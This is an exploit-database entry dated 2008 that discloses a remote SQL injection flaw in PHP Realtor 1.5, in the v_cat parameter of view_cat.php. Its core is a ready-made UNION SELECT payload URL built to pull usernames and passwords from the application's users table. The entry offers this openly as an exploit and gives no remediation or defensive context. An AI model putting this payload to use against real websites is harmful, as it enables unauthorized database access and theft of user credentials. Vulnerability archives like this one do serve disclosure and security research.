id: 3850
date: 10/06/2008
title: PHP Realtor 1.5 (view_cat.php v_cat) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

=======================================================================
PHP Realtor 1.5 (view_cat.php v_cat) Remote SQL Injection Vulnerability
=======================================================================


###############################################################
##
## Remote SQL Injection Vulnerability
##
## PHP Realtor 1.5 ( view_cat.php v_cat )
##
## http://selectdevelopment.com/
###############################################################
###############################################################
## AuTh0r : Mr.SQL
########################
########################
##
## -[[: Exploite :]]-
##
## www.TraGeT./view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1--
##
########################
########################



#  0day.today [2023-03-22]  #